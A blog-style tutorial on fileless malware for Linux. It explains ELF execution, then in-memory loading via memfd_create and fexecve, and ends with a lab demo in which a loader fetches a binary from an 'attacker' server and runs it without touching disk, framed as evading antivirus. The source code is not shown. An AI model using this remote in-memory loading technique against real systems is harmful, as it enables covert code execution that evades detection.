File-less malware: what and how

What is file-less malware? How does it work on Linux?

According to Wikipedia, file-less malware is a variant of computer related malicious software that exists exclusively as a computer memory-based artifact, i.e. in RAM.

In other words, the malware/program is never written to the hard disk but is loaded directly into memory.

How???

To get a better understanding of how that happens on Linux, we need to understand how a normal program is loaded into memory and executed. If you already know this, feel free to skip the next section.

How does a normal program load and execute?

This is a “HUGE” topic for a mere blog post, so we’ll just scratch the surface and look at ELF files. ELF is the main binary format in use on modern Linux systems, and kernel support for it is implemented in the file fs/binfmt_elf.c.

Let’s build our own C program to generate an ELF binary so we can follow and know what we are doing.

Create a C program file with vim not_hello_world.c, and paste the below code into it.

The above code will print out the argc, argv and envp values to the standard output.

Compile it : gcc not_hello_world.c -o not_hello_world.o

Check file type : file not_hello_world.o

Run it : ./not_hello_world.o 12345 123 12345678901234567890 1234

This still does not tell us what is happening behind the scenes, but it does tell us that each program has some dedicated memory space where it stores a copy of its arguments and environment variables in contiguous memory locations. To gather more information, we can use the strace utility to trace the system calls made by our program.

Command: strace ./not_hello_world.o myarg1 myarg2 myarg3 2>strace_output.log 1>program_output.log
NOTE: 2 (stderr) is redirected to the strace_output.log file and 1 (stdout) is redirected to the program_output.log file.

Command: cat strace_output.log

At first it looks confusing and very difficult to understand, but it is simple and straightforward once you know the format of this output: each line has the form syscall_name(arguments) = return_value.

Now, if we look at line 1 of the strace_output.log file with this newly gained insight, it is very clear that we are calling the execve syscall and passing arguments to it.

According to man 2 execve: execve() executes the program referred to by pathname. This causes the program that is currently being run by the calling process to be replaced with a new program, with newly initialized stack, heap, and (initialized and uninitialized) data segments.

This shows that the execve() syscall is what actually loads the executable ELF file into memory!! Interestingly, our binary gathers all the data to be printed from multiple locations and then prints it all at once at the end with a single write() syscall. The return value of write() is the number of bytes the syscall wrote, which is exactly the number of bytes that went to stdout, which we redirected to a file.

We can check whether the byte count of the file matches the byte count returned by the write() syscall using → wc -c program_output.log

output:

With this, we know how a normal program executes in memory. The diagram below summarizes it for a quick recap.

Idea of file-less?

In the usual scenario, a compiled malicious binary is stored on the victim’s machine and then somehow executed to serve the attacker’s purpose. In that case we have several simple methods and tools to analyze the binary and find out what it is going to do. Most of the time, our antivirus can scan the system’s hard disk and tell whether there is malware on it or not.

And we all trust our anti-virus for that!! 😜

But what if an attacker somehow loaded the ELF file directly into memory, without writing it to the hard disk (not even as a temp file)? On Linux, one way to do that is via the memfd_create() syscall. This creates an "anonymous file" and returns a "file descriptor" to it.

OK! This had me at the first line of the man page (man 2 memfd_create). But there is more to it.

We can now create a file directly in RAM; all we need is a way to execute it. We could have used the same old execve for this, but we don’t have a file pathname to begin with. After looking through the variants of the exec family of functions, I stumbled upon fexecve(), which executes a program specified via a file descriptor.

Now we have both: a way to create in-memory files with memfd_create() and a way to execute them with fexecve(). We just need a program that glues everything together with some neat logic to make things work the way we want.

First fileless program in C

I’ve written a simple C program (loader.c) that creates an in-memory file, copies the data of a (local) binary into it, and then executes it. Simple, isn't it?

It is worth spending some time on this code to understand what it loads into memory, and how and why.

We can compile this code to generate an ELF file with gcc loader.c -o loader.o. Once compiled, we can run it with ./loader.o

Since there are no arguments (argc < 2), it should fail with usage information on stdout.

Let’s try again with some arguments this time.

This time things go differently. The loader:

  1. Creates an in-memory file and gets a file descriptor back (fd1).
  2. Opens the local binary file (argv[1] = /usr/bin/file) and stores its file descriptor in fd2.
  3. Runs a read-write loop until everything from fd2 has been written to fd1.
  4. Adjusts the argv to be passed to the in-memory file. The new argv should look like → /usr/bin/file arg1 arg2 arg3. This means we just have to drop argv[0] and shift everything that remains down by one index.
  5. Executes fd1, the in-memory file.

Output:

The last line of the output is proof that our in-memory file executed successfully… Now we can take it to the next level.

Loading a binary from the network

At this point, we know how to write basic code that takes a local binary, creates an in-memory file for it and then executes it.

But an attacker won’t use it just to run local binaries that could be executed directly. Instead, they would want to take a binary sitting on their server and load it straight into the memory of the victim’s system. The payload will not show up in disk analysis tools or in commands like ls, and it also runs out of reach of the full disk scans that "Anti-Virus" software offers. In theory, the attacker could run anything from their system on the victim's system without leaving any trace on the hard disk.

To simulate this, I’ve prepared a setup with a server that hosts a malicious binary and a victim’s system where loader.o is present.

Without further ado, let’s get things prepared for our test. We need 3 things:

  1. loader binary (on victim’s machine)
  2. malicious binary (on attacker’s machine)
  3. TCP socket server to host the malicious binary (on attacker’s machine)

I started out with a (not so) malicious binary, which simply creates a plain-text file when executed.

Source Code: malicious_program.c

Compile it -> gcc malicious_program.c -o malicious_program.o

Next, I wrote a small Python TCP socket server that will host the malicious_program.o binary.

Source Code: python_server.py

Finally, we modify the previous local binary loader code to read from a connected socket instead of a local binary.

Source code: network_loader.c

Compile it → gcc network_loader.c -o network_loader.o

With this, we have everything ready. A few more steps and we are done.

  1. Start the python server on attacker’s machine. — python3 python_server.py
  2. Place the network_loader.o on victim's machine.
  3. Politely ask the victim to execute the binary — ./network_loader.o 192.168.56.56 1234
  4. Sit back and enjoy!

And if we check the victim’s working directory, we can see a file named NOTICE_for_U.txt there, which confirms that the remote binary ran successfully on the victim's machine.

Voila! We just executed a remotely located binary without leaving any trace on the hard disk for further analysis. What we have is a loader binary that reads unknown data from somewhere and just executes it. There is nothing in the loader binary that most automated analysis tools could detect as malicious… even VirusTotal does not detect it for what it is.

CVE-2021-4034 describes a local privilege escalation vulnerability found in polkit’s pkexec utility. I’m not sure whether it is a false positive or a match based on similar signatures.
